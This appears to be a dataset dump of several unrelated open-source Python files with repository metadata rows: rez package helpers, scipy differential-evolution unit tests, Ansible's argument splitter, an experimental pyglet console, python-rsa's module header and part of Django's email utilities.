paths (list of str, optional): paths to search for package families,
defaults to `config.packages_path`.
Returns:
`PackageFamily` iterator.
"""
for path in (paths or config.packages_path):
repo = package_repository_manager.get_repository(path)
for resource in repo.iter_package_families():
yield PackageFamily(resource)
def iter_packages(name, range_=None, paths=None):
"""Iterate over `Package` instances, in no particular order.
Packages of the same name and version earlier in the search path take
precedence - equivalent packages later in the paths are ignored. Packages
are not returned in any specific order.
Args:
name (str): Name of the package, eg 'maya'.
range_ (VersionRange or str): If provided, limits the versions returned
to those in `range_`.
paths (list of str, optional): paths to search for packages, defaults
to `config.packages_path`.
Returns:
`Package` iterator.
"""
entries = _get_families(name, paths)
seen = set()
for repo, family_resource in entries:
for package_resource in repo.iter_packages(family_resource):
key = (package_resource.name, package_resource.version)
if key in seen:
continue
seen.add(key)
if range_:
if isinstance(range_, basestring):
range_ = VersionRange(range_)
if package_resource.version not in range_:
continue
yield Package(package_resource)
def get_package(name, version, paths=None):
"""Get an exact version of a package.
Args:
name (str): Name of the package, eg 'maya'.
version (Version or str): Version of the package, eg '1.0.0'
paths (list of str, optional): paths to search for package, defaults
to `config.packages_path`.
Returns:
`Package` object, or None if the package was not found.
"""
if isinstance(version, basestring):
range_ = VersionRange("==%s" % version)
else:
range_ = VersionRange.from_version(version, "==")
it = iter_packages(name, range_, paths)
try:
return it.next()
except StopIteration:
return None
def get_package_from_string(txt, paths=None):
"""Get a package given a string.
Args:
txt (str): String such as 'foo', 'bah-1.3'.
paths (list of str, optional): paths to search for package, defaults
to `config.packages_path`.
Returns:
`Package` instance, or None if no package was found.
"""
o = VersionedObject(txt)
return get_package(o.name, o.version, paths=paths)
def get_developer_package(path):
"""Load a developer package.
A developer package may for example be a package.yaml or package.py in a
user's source directory.
Note:
The resulting package has a 'filepath' attribute added to it, that does
not normally appear on a `Package` object. A developer package is the
only case where we know we can directly associate a 'package.*' file
with a package - other packages can come from any kind of package repo,
which may or may not associate a single file with a single package (or
any file for that matter - it may come from a database).
Args:
path: Directory containing the package definition file.
Returns:
`Package` object.
"""
data = None
for format_ in (FileFormat.py, FileFormat.yaml):
filepath = os.path.join(path, "package.%s" % format_.extension)
if os.path.isfile(filepath):
data = load_from_file(filepath, format_)
break
if data is None:
raise PackageMetadataError("No package definition file found at %s" % path)
name = data.get("name")
if name is None or not isinstance(name, basestring):
raise PackageMetadataError(
"Error in %r - missing or non-string field 'name'" % filepath)
package = create_package(name, data)
setattr(package, "filepath", filepath)
return package
def create_package(name, data):
"""Create a package given package data.
Args:
name (str): Package name.
data (dict): Package data. Must conform to `package_maker.package_schema`.
Returns:
`Package` object.
"""
from rez.package_maker__ import PackageMaker
maker = PackageMaker(name, data)
return maker.get_package()
def get_variant(variant_handle):
"""Create a variant given its handle.
Args:
variant_handle (`ResourceHandle` or dict): Resource handle, or
equivalent dict.
Returns:
`Variant`.
"""
if isinstance(variant_handle, dict):
variant_handle = ResourceHandle.from_dict(variant_handle)
variant_resource = package_repository_manager.get_resource(variant_handle)
variant = Variant(variant_resource)
return variant
def get_last_release_time(name, paths=None):
"""Returns the most recent time this package was released.
Note that releasing a variant into an already-released package is also
considered a package release.
Returns:
int: Epoch time of last package release, or zero if this cannot be
determined.
"""
entries = _get_families(name, paths)
max_time = 0
for repo, family_resource in entries:
time_ = repo.get_last_release_time(family_resource)
if time_ == 0:
return 0
max_time = max(max_time, time_)
return max_time
def get_completions(prefix, paths=None, family_only=False):
"""Get autocompletion options given a prefix string.
Example:
>>> get_completions("may")
set(["maya", "maya_utils"])
>>> get_completions("maya-")
set(["maya-2013.1", "maya-2015.0.sp1"])
Args:
prefix (str): Prefix to match.
paths (list of str): paths to search for packages, defaults to
`config.packages_path`.
family_only (bool): If True, only match package names, do not include
version component.
Returns:
Set of strings, may be empty.
"""
op = None
if prefix:
if prefix[0] in ('!', '~'):
if family_only:
return set()
op = prefix[0]
prefix = prefix[1:]
fam = None
for ch in ('-', '@', '#'):
if ch in prefix:
if family_only:
return set()
fam = prefix.split(ch)[0]
break
words = set()
if not fam:
words = set(x.name for x in iter_package_families(paths=paths)
if x.name.startswith(prefix))
if len(words) == 1:
fam = iter(words).next()
if family_only:
return words
if fam:
it = iter_packages(fam, paths=paths)
words.update(x.qualified_name for x in it
if x.qualified_name.startswith(prefix))
if op:
words = set(op + x for x in words)
return words
def get_latest_package(name, range_=None, paths=None, error=False):
"""Get the latest package for a given package name.
Args:
name (str): Package name.
range_ (`VersionRange`): Version range to search within.
paths (list of str, optional): paths to search for package families,
defaults to `config.packages_path`.
error (bool): If True, raise an error if no package is found.
Returns:
`Package` object, or None if no package is found.
"""
it = iter_packages(name, range_=range_, paths=paths)
try:
return max(it, key=lambda x: x.version)
except ValueError: # empty sequence
if error:
raise PackageFamilyNotFoundError("No such package family %r" % name)
return None
def _get_families(name, paths=None):
entries = []
for path in (paths or config.packages_path):
repo = package_repository_manager.get_repository(path)
family_resource = repo.get_package_family(name)
if family_resource:
entries.append((repo, family_resource))
return entries
| gpl-3.0 | -1,390,221,877,218,622,700 | 31.617997 | 86 | 0.612846 | false |
Shaswat27/scipy | scipy/optimize/tests/test__differential_evolution.py | 1 | 17376 | """
Unit tests for the differential global minimization algorithm.
"""
from scipy.optimize import _differentialevolution
from scipy.optimize._differentialevolution import DifferentialEvolutionSolver
from scipy.optimize import differential_evolution
import numpy as np
from scipy.optimize import rosen
from numpy.testing import (assert_equal, TestCase, assert_allclose,
run_module_suite, assert_almost_equal,
assert_string_equal, assert_raises, assert_)
class TestDifferentialEvolutionSolver(TestCase):
def setUp(self):
self.old_seterr = np.seterr(invalid='raise')
self.limits = np.array([[0., 0.],
[2., 2.]])
self.bounds = [(0., 2.), (0., 2.)]
self.dummy_solver = DifferentialEvolutionSolver(self.quadratic,
[(0, 100)])
# dummy_solver2 will be used to test mutation strategies
self.dummy_solver2 = DifferentialEvolutionSolver(self.quadratic,
[(0, 1)],
popsize=7,
mutation=0.5)
# create a population that's only 7 members long
# [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]
population = np.atleast_2d(np.arange(0.1, 0.8, 0.1)).T
self.dummy_solver2.population = population
def tearDown(self):
np.seterr(**self.old_seterr)
def quadratic(self, x):
return x[0]**2
def test__strategy_resolves(self):
# test that the correct mutation function is resolved by
# different requested strategy arguments
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1exp')
assert_equal(solver.strategy, 'best1exp')
assert_equal(solver.mutation_func.__name__, '_best1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1bin')
assert_equal(solver.strategy, 'best1bin')
assert_equal(solver.mutation_func.__name__, '_best1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand1bin')
assert_equal(solver.strategy, 'rand1bin')
assert_equal(solver.mutation_func.__name__, '_rand1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand1exp')
assert_equal(solver.strategy, 'rand1exp')
assert_equal(solver.mutation_func.__name__, '_rand1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2exp')
assert_equal(solver.strategy, 'rand2exp')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best2bin')
assert_equal(solver.strategy, 'best2bin')
assert_equal(solver.mutation_func.__name__, '_best2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2bin')
assert_equal(solver.strategy, 'rand2bin')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2exp')
assert_equal(solver.strategy, 'rand2exp')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='randtobest1bin')
assert_equal(solver.strategy, 'randtobest1bin')
assert_equal(solver.mutation_func.__name__, '_randtobest1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='randtobest1exp')
assert_equal(solver.strategy, 'randtobest1exp')
assert_equal(solver.mutation_func.__name__, '_randtobest1')
def test__mutate1(self):
# strategies */1/*, i.e. rand/1/bin, best/1/exp, etc.
result = np.array([0.05])
trial = self.dummy_solver2._best1((2, 3, 4, 5, 6))
assert_allclose(trial, result)
result = np.array([0.25])
trial = self.dummy_solver2._rand1((2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test__mutate2(self):
# strategies */2/*, i.e. rand/2/bin, best/2/exp, etc.
# [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]
result = np.array([-0.1])
trial = self.dummy_solver2._best2((2, 3, 4, 5, 6))
assert_allclose(trial, result)
result = np.array([0.1])
trial = self.dummy_solver2._rand2((2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test__randtobest1(self):
# strategies randtobest/1/*
result = np.array([0.1])
trial = self.dummy_solver2._randtobest1(1, (2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test_can_init_with_dithering(self):
mutation = (0.5, 1)
solver = DifferentialEvolutionSolver(self.quadratic,
self.bounds,
mutation=mutation)
self.assertEqual(solver.dither, list(mutation))
def test_invalid_mutation_values_arent_accepted(self):
func = rosen
mutation = (0.5, 3)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = (-1, 1)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = (0.1, np.nan)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = 0.5
solver = DifferentialEvolutionSolver(func,
self.bounds,
mutation=mutation)
assert_equal(0.5, solver.scale)
assert_equal(None, solver.dither)
def test__scale_parameters(self):
trial = np.array([0.3])
assert_equal(30, self.dummy_solver._scale_parameters(trial))
# it should also work with the limits reversed
self.dummy_solver.limits = np.array([[100], [0.]])
assert_equal(30, self.dummy_solver._scale_parameters(trial))
def test__unscale_parameters(self):
trial = np.array([30])
assert_equal(0.3, self.dummy_solver._unscale_parameters(trial))
# it should also work with the limits reversed
self.dummy_solver.limits = np.array([[100], [0.]])
assert_equal(0.3, self.dummy_solver._unscale_parameters(trial))
def test__ensure_constraint(self):
trial = np.array([1.1, -100, 2., 300., -0.00001])
self.dummy_solver._ensure_constraint(trial)
assert_equal(np.all(trial <= 1), True)
def test_differential_evolution(self):
# test that the Jmin of DifferentialEvolutionSolver
# is the same as the function evaluation
solver = DifferentialEvolutionSolver(self.quadratic, [(-2, 2)])
result = solver.solve()
assert_almost_equal(result.fun, self.quadratic(result.x))
def test_best_solution_retrieval(self):
# test that the getter property method for the best solution works.
solver = DifferentialEvolutionSolver(self.quadratic, [(-2, 2)])
result = solver.solve()
assert_equal(result.x, solver.x)
def test_callback_terminates(self):
# test that if the callback returns true, then the minimization halts
bounds = [(0, 2), (0, 2)]
def callback(param, convergence=0.):
return True
result = differential_evolution(rosen, bounds, callback=callback)
assert_string_equal(result.message,
'callback function requested stop early '
'by returning True')
def test_args_tuple_is_passed(self):
# test that the args tuple is passed to the cost function properly.
bounds = [(-10, 10)]
args = (1., 2., 3.)
def quadratic(x, *args):
if type(args) != tuple:
raise ValueError('args should be a tuple')
return args[0] + args[1] * x + args[2] * x**2.
result = differential_evolution(quadratic,
bounds,
args=args,
polish=True)
assert_almost_equal(result.fun, 2 / 3.)
def test_init_with_invalid_strategy(self):
# test that passing an invalid strategy raises ValueError
func = rosen
bounds = [(-3, 3)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds,
strategy='abc')
def test_bounds_checking(self):
# test that the bounds checking works
func = rosen
bounds = [(-3, None)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
bounds = [(-3)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
bounds = [(-3, 3), (3, 4, 5)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
def test_select_samples(self):
# select_samples should return 5 separate random numbers.
limits = np.arange(12., dtype='float64').reshape(2, 6)
bounds = list(zip(limits[0, :], limits[1, :]))
solver = DifferentialEvolutionSolver(None, bounds, popsize=1)
candidate = 0
r1, r2, r3, r4, r5 = solver._select_samples(candidate, 5)
assert_equal(
len(np.unique(np.array([candidate, r1, r2, r3, r4, r5]))), 6)
def test_maxiter_stops_solve(self):
# test that if the maximum number of iterations is exceeded
# the solver stops.
solver = DifferentialEvolutionSolver(rosen, self.bounds, maxiter=1)
result = solver.solve()
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of iterations has been exceeded.')
def test_maxfun_stops_solve(self):
# test that if the maximum number of function evaluations is exceeded
# during initialisation the solver stops
solver = DifferentialEvolutionSolver(rosen, self.bounds, maxfun=1,
polish=False)
result = solver.solve()
assert_equal(result.nfev, 2)
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of function evaluations has '
'been exceeded.')
# test that if the maximum number of function evaluations is exceeded
# during the actual minimisation, then the solver stops.
# Have to turn polishing off, as this will still occur even if maxfun
# is reached. For popsize=5 and len(bounds)=2, then there are only 10
# function evaluations during initialisation.
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
popsize=5,
polish=False,
maxfun=40)
result = solver.solve()
assert_equal(result.nfev, 41)
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of function evaluations has '
'been exceeded.')
def test_quadratic(self):
# test the quadratic function from object
solver = DifferentialEvolutionSolver(self.quadratic,
[(-100, 100)],
tol=0.02)
solver.solve()
assert_equal(np.argmin(solver.population_energies), 0)
def test_quadratic_from_diff_ev(self):
# test the quadratic function from differential_evolution function
differential_evolution(self.quadratic,
[(-100, 100)],
tol=0.02)
def test_seed_gives_repeatability(self):
result = differential_evolution(self.quadratic,
[(-100, 100)],
polish=False,
seed=1,
tol=0.5)
result2 = differential_evolution(self.quadratic,
[(-100, 100)],
polish=False,
seed=1,
tol=0.5)
assert_equal(result.x, result2.x)
def test_exp_runs(self):
# test whether exponential mutation loop runs
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1exp',
maxiter=1)
solver.solve()
def test__make_random_gen(self):
# If seed is None, return the RandomState singleton used by np.random.
# If seed is an int, return a new RandomState instance seeded with seed.
# If seed is already a RandomState instance, return it.
# Otherwise raise ValueError.
rsi = _differentialevolution._make_random_gen(1)
assert_equal(type(rsi), np.random.RandomState)
rsi = _differentialevolution._make_random_gen(rsi)
assert_equal(type(rsi), np.random.RandomState)
rsi = _differentialevolution._make_random_gen(None)
assert_equal(type(rsi), np.random.RandomState)
self.assertRaises(
ValueError, _differentialevolution._make_random_gen, 'a')
def test_gh_4511_regression(self):
# This modification of the differential evolution docstring example
# uses a custom popsize that had triggered an off-by-one error.
# Because we do not care about solving the optimization problem in
# this test, we use maxiter=1 to reduce the testing time.
bounds = [(-5, 5), (-5, 5)]
result = differential_evolution(rosen, bounds, popsize=1815, maxiter=1)
def test_calculate_population_energies(self):
# if popsize is 2 then the overall generation has size (4,)
solver = DifferentialEvolutionSolver(rosen, self.bounds, popsize=2)
solver._calculate_population_energies()
assert_equal(np.argmin(solver.population_energies), 0)
# initial calculation of the energies should require 4 nfev.
assert_equal(solver._nfev, 4)
def test_iteration(self):
# test that DifferentialEvolutionSolver is iterable
# if popsize is 2 then the overall generation has size (4,)
solver = DifferentialEvolutionSolver(rosen, self.bounds, popsize=2,
maxfun=8)
x, fun = next(solver)
assert_equal(np.size(x, 0), 2)
# 4 nfev are required for initial calculation of energies, 4 nfev are
# required for the evolution of the 4 population members.
assert_equal(solver._nfev, 8)
# the next generation should halt because it exceeds maxfun
assert_raises(StopIteration, next, solver)
# check a proper minimisation can be done by an iterable solver
solver = DifferentialEvolutionSolver(rosen, self.bounds)
for i, soln in enumerate(solver):
x_current, fun_current = soln
# need to have this otherwise the solver would never stop.
if i == 1000:
break
assert_almost_equal(fun_current, 0)
def test_convergence(self):
solver = DifferentialEvolutionSolver(rosen, self.bounds, tol=0.2,
polish=False)
solver.solve()
assert_(solver.convergence < 0.2)
if __name__ == '__main__':
run_module_suite()
| bsd-3-clause | -8,830,625,670,992,213,000 | 41.072639 | 80 | 0.53102 | false |
GheRivero/ansible | lib/ansible/parsing/splitter.py | 49 | 10682 | # (c) 2014 James Cammarata, <jcammarata@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import codecs
import re
from ansible.errors import AnsibleParserError
from ansible.module_utils._text import to_text
from ansible.parsing.quoting import unquote
# Decode escapes adapted from rspeer's answer here:
# http://stackoverflow.com/questions/4020539/process-escape-sequences-in-a-string-in-python
_HEXCHAR = '[a-fA-F0-9]'
_ESCAPE_SEQUENCE_RE = re.compile(r'''
( \\U{0} # 8-digit hex escapes
| \\u{1} # 4-digit hex escapes
| \\x{2} # 2-digit hex escapes
| \\N\{{[^}}]+\}} # Unicode characters by name
| \\[\\'"abfnrtv] # Single-character escapes
)'''.format(_HEXCHAR * 8, _HEXCHAR * 4, _HEXCHAR * 2), re.UNICODE | re.VERBOSE)
def _decode_escapes(s):
def decode_match(match):
return codecs.decode(match.group(0), 'unicode-escape')
return _ESCAPE_SEQUENCE_RE.sub(decode_match, s)
def parse_kv(args, check_raw=False):
'''
Convert a string of key/value items to a dict. If any free-form params
are found and the check_raw option is set to True, they will be added
to a new parameter called '_raw_params'. If check_raw is not enabled,
they will simply be ignored.
'''
args = to_text(args, nonstring='passthru')
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError as ve:
if 'no closing quotation' in str(ve).lower():
raise AnsibleParserError("error parsing argument string, try quoting the entire line.", orig_exc=ve)
else:
raise
raw_params = []
for orig_x in vargs:
x = _decode_escapes(orig_x)
if "=" in x:
pos = 0
try:
while True:
pos = x.index('=', pos + 1)
if pos > 0 and x[pos - 1] != '\\':
break
except ValueError:
# ran out of string, but we must have some escaped equals,
# so replace those and append this to the list of raw params
raw_params.append(x.replace('\\=', '='))
continue
k = x[:pos]
v = x[pos + 1:]
# FIXME: make the retrieval of this list of shell/command
# options a function, so the list is centralized
if check_raw and k not in ('creates', 'removes', 'chdir', 'executable', 'warn'):
raw_params.append(orig_x)
else:
options[k.strip()] = unquote(v.strip())
else:
raw_params.append(orig_x)
# recombine the free-form params, if any were found, and assign
# them to a special option for use later by the shell/command module
if len(raw_params) > 0:
options[u'_raw_params'] = ' '.join(raw_params)
return options
def _get_quote_state(token, quote_char):
'''
the goal of this block is to determine if the quoted string
is unterminated in which case it needs to be put back together
'''
# the char before the current one, used to see if
# the current character is escaped
prev_char = None
for idx, cur_char in enumerate(token):
if idx > 0:
prev_char = token[idx - 1]
if cur_char in '"\'' and prev_char != '\\':
if quote_char:
if cur_char == quote_char:
quote_char = None
else:
quote_char = cur_char
return quote_char
def _count_jinja2_blocks(token, cur_depth, open_token, close_token):
'''
this function counts the number of opening/closing blocks for a
given opening/closing type and adjusts the current depth for that
block based on the difference
'''
num_open = token.count(open_token)
num_close = token.count(close_token)
if num_open != num_close:
cur_depth += (num_open - num_close)
if cur_depth < 0:
cur_depth = 0
return cur_depth
def split_args(args):
'''
Splits args on whitespace, but intelligently reassembles
those that may have been split over a jinja2 block or quotes.
When used in a remote module, we won't ever have to be concerned about
jinja2 blocks, however this function is/will be used in the
core portions as well before the args are templated.
example input: a=b c="foo bar"
example output: ['a=b', 'c="foo bar"']
Basically this is a variation shlex that has some more intelligence for
how Ansible needs to use it.
'''
# the list of params parsed out of the arg string
# this is going to be the result value when we are done
params = []
# Initial split on white space
args = args.strip()
items = args.strip().split('\n')
# iterate over the tokens, and reassemble any that may have been
# split on a space inside a jinja2 block.
# ex if tokens are "{{", "foo", "}}" these go together
# These variables are used
# to keep track of the state of the parsing, since blocks and quotes
# may be nested within each other.
quote_char = None
inside_quotes = False
print_depth = 0 # used to count nested jinja2 {{ }} blocks
block_depth = 0 # used to count nested jinja2 {% %} blocks
comment_depth = 0 # used to count nested jinja2 {# #} blocks
# now we loop over each split chunk, coalescing tokens if the white space
# split occurred within quotes or a jinja2 block of some kind
for (itemidx, item) in enumerate(items):
# we split on spaces and newlines separately, so that we
# can tell which character we split on for reassembly
# inside quotation characters
tokens = item.strip().split(' ')
line_continuation = False
for (idx, token) in enumerate(tokens):
# if we hit a line continuation character, but
# we're not inside quotes, ignore it and continue
# on to the next token while setting a flag
if token == '\\' and not inside_quotes:
line_continuation = True
continue
# store the previous quoting state for checking later
was_inside_quotes = inside_quotes
quote_char = _get_quote_state(token, quote_char)
inside_quotes = quote_char is not None
# multiple conditions may append a token to the list of params,
# so we keep track with this flag to make sure it only happens once
# append means add to the end of the list, don't append means concatenate
# it to the end of the last token
appended = False
# if we're inside quotes now, but weren't before, append the token
# to the end of the list, since we'll tack on more to it later
# otherwise, if we're inside any jinja2 block, inside quotes, or we were
# inside quotes (but aren't now) concat this token to the last param
if inside_quotes and not was_inside_quotes and not(print_depth or block_depth or comment_depth):
params.append(token)
appended = True
elif print_depth or block_depth or comment_depth or inside_quotes or was_inside_quotes:
if idx == 0 and was_inside_quotes:
params[-1] = "%s%s" % (params[-1], token)
elif len(tokens) > 1:
spacer = ''
if idx > 0:
spacer = ' '
params[-1] = "%s%s%s" % (params[-1], spacer, token)
else:
params[-1] = "%s\n%s" % (params[-1], token)
appended = True
# if the number of paired block tags is not the same, the depth has changed, so we calculate that here
# and may append the current token to the params (if we haven't previously done so)
prev_print_depth = print_depth
print_depth = _count_jinja2_blocks(token, print_depth, "{{", "}}")
if print_depth != prev_print_depth and not appended:
params.append(token)
appended = True
prev_block_depth = block_depth
block_depth = _count_jinja2_blocks(token, block_depth, "{%", "%}")
if block_depth != prev_block_depth and not appended:
params.append(token)
appended = True
prev_comment_depth = comment_depth
comment_depth = _count_jinja2_blocks(token, comment_depth, "{#", "#}")
if comment_depth != prev_comment_depth and not appended:
params.append(token)
appended = True
# finally, if we're at zero depth for all blocks and not inside quotes, and have not
# yet appended anything to the list of params, we do so now
if not (print_depth or block_depth or comment_depth) and not inside_quotes and not appended and token != '':
params.append(token)
# if this was the last token in the list, and we have more than
# one item (meaning we split on newlines), add a newline back here
# to preserve the original structure
if len(items) > 1 and itemidx != len(items) - 1 and not line_continuation:
params[-1] += '\n'
# always clear the line continuation flag
line_continuation = False
# If we're done and things are not at zero depth or we're still inside quotes,
# raise an error to indicate that the args were unbalanced
if print_depth or block_depth or comment_depth or inside_quotes:
raise AnsibleParserError(u"failed at splitting arguments, either an unbalanced jinja2 block or quotes: {0}".format(args))
return params
| gpl-3.0 | -1,751,901,497,148,542,000 | 39.157895 | 129 | 0.599232 | false |
seeminglee/pyglet64 | experimental/console.py | 29 | 3991 | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import code
import sys
import traceback
import pyglet.event
import pyglet.text
from pyglet.window import key
from pyglet.gl import *
class Console(object):
def __init__(self, width, height, globals=None, locals=None):
self.font = pyglet.text.default_font_factory.get_font('bitstream vera sans mono', 12)
self.lines = []
self.buffer = ''
self.pre_buffer = ''
self.prompt = '>>> '
self.prompt2 = '... '
self.globals = globals
self.locals = locals
self.write_pending = ''
self.width, self.height = (width, height)
self.max_lines = self.height / self.font.glyph_height - 1
self.write('pyglet command console\n')
self.write('Version %s\n' % __version__)
def on_key_press(self, symbol, modifiers):
# TODO cursor control / line editing
if modifiers & key.key.MOD_CTRL and symbol == key.key.C:
self.buffer = ''
self.pre_buffer = ''
return
if symbol == key.key.ENTER:
self.write('%s%s\n' % (self.get_prompt(), self.buffer))
self.execute(self.pre_buffer + self.buffer)
self.buffer = ''
return
if symbol == key.key.BACKSPACE:
self.buffer = self.buffer[:-1]
return
return EVENT_UNHANDLED
def on_text(self, text):
if ' ' <= text <= '~':
self.buffer += text
if 0xae <= ord(text) <= 0xff:
self.buffer += text
def write(self, text):
if self.write_pending:
text = self.write_pending + text
self.write_pending = ''
if type(text) in (str, unicode):
text = text.split('\n')
if text[-1] != '':
self.write_pending = text[-1]
del text[-1]
self.lines = [pyglet.text.layout_text(line.strip(), font=self.font)
for line in text] + self.lines
if len(self.lines) > self.max_lines:
del self.lines[-1]
def execute(self, input):
old_stderr, old_stdout = sys.stderr, sys.stdout
sys.stderr = sys.stdout = self
try:
c = code.compile_command(input, '<pyglet console>')
if c is None:
self.pre_buffer = '%s\n' % input
else:
self.pre_buffer = ''
result = eval(c, self.globals, self.locals)
if result is not None:
self.write('%r\n' % result)
except:
traceback.print_exc()
self.pre_buffer = ''
sys.stderr = old_stderr
sys.stdout = old_stdout
def get_prompt(self):
if self.pre_buffer:
return self.prompt2
return self.prompt
__last = None
def draw(self):
pyglet.text.begin()
glPushMatrix()
glTranslatef(0, self.height, 0)
for line in self.lines[::-1]:
line.draw()
glTranslatef(0, -self.font.glyph_height, 0)
line = self.get_prompt() + self.buffer
if self.__last is None or line != self.__last[0]:
self.__last = (line, pyglet.text.layout_text(line.strip(),
font=self.font))
self.__last[1].draw()
glPopMatrix()
pyglet.text.end()
if __name__ == '__main__':
from pyglet.window import *
from pyglet.window.event import *
from pyglet import clock
w1 = Window(width=600, height=400)
console = Console(w1.width, w1.height)
w1.push_handlers(console)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
while not w1.has_exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
console.draw()
w1.flip()
| bsd-3-clause | 6,713,850,565,843,153,000 | 27.304965 | 93 | 0.541468 | false |
javier-ruiz-b/docker-rasppi-images | raspberry-google-home/env/lib/python3.7/site-packages/rsa/__init__.py | 1 | 1542 | # Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use compression of the cleartext input to
prevent repetitions, or other common security improvements. Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError, find_signature_hash, sign_hash, compute_hash
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = '2020-06-12'
__version__ = '4.6'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError',
'find_signature_hash', 'compute_hash', 'sign_hash']
| apache-2.0 | 2,662,950,397,415,766,500 | 37.525 | 79 | 0.726152 | false |
BitWriters/Zenith_project | zango/lib/python3.5/site-packages/django/core/mail/__init__.py | 230 | 4701 | """
Tools for sending email.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils.module_loading import import_string
# Imported for backwards compatibility, and for the sake
# of a cleaner namespace. These symbols used to be in
# django/core/mail.py before the introduction of email
# backends and the subsequent reorganization (See #10355)
from django.core.mail.utils import CachedDnsName, DNS_NAME
from django.core.mail.message import (
EmailMessage, EmailMultiAlternatives,
SafeMIMEText, SafeMIMEMultipart,
DEFAULT_ATTACHMENT_MIME_TYPE, make_msgid,
BadHeaderError, forbid_multi_line_headers)
__all__ = [
'CachedDnsName', 'DNS_NAME', 'EmailMessage', 'EmailMultiAlternatives',
'SafeMIMEText', 'SafeMIMEMultipart', 'DEFAULT_ATTACHMENT_MIME_TYPE',
'make_msgid', 'BadHeaderError', 'forbid_multi_line_headers',
'get_connection', 'send_mail', 'send_mass_mail', 'mail_admins',
'mail_managers',
]
def get_connection(backend=None, fail_silently=False, **kwds):
"""Load an email backend and return an instance of it.
If backend is None (default) settings.EMAIL_BACKEND is used.
Both fail_silently and other keyword arguments are used in the
constructor of the backend.
"""
klass = import_string(backend or settings.EMAIL_BACKEND)
return klass(fail_silently=fail_silently, **kwds)
def send_mail(subject, message, from_email, recipient_list,
fail_silently=False, auth_user=None, auth_password=None,
connection=None, html_message=None):
"""
Easy wrapper for sending a single message to a recipient list. All members
of the recipient list will see the other recipients in the 'To' field.
If auth_user is None, the EMAIL_HOST_USER setting is used.
If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.
Note: The API for this method is frozen. New code wanting to extend the
functionality should use the EmailMessage class directly.
"""
connection = connection or get_connection(username=auth_user,
password=auth_password,
fail_silently=fail_silently)
mail = EmailMultiAlternatives(subject, message, from_email, recipient_list,
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
return mail.send()
def send_mass_mail(datatuple, fail_silently=False, auth_user=None,
auth_password=None, connection=None):
"""
Given a datatuple of (subject, message, from_email, recipient_list), sends
each message to each recipient list. Returns the number of emails sent.
If from_email is None, the DEFAULT_FROM_EMAIL setting is used.
If auth_user and auth_password are set, they're used to log in.
If auth_user is None, the EMAIL_HOST_USER setting is used.
If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.
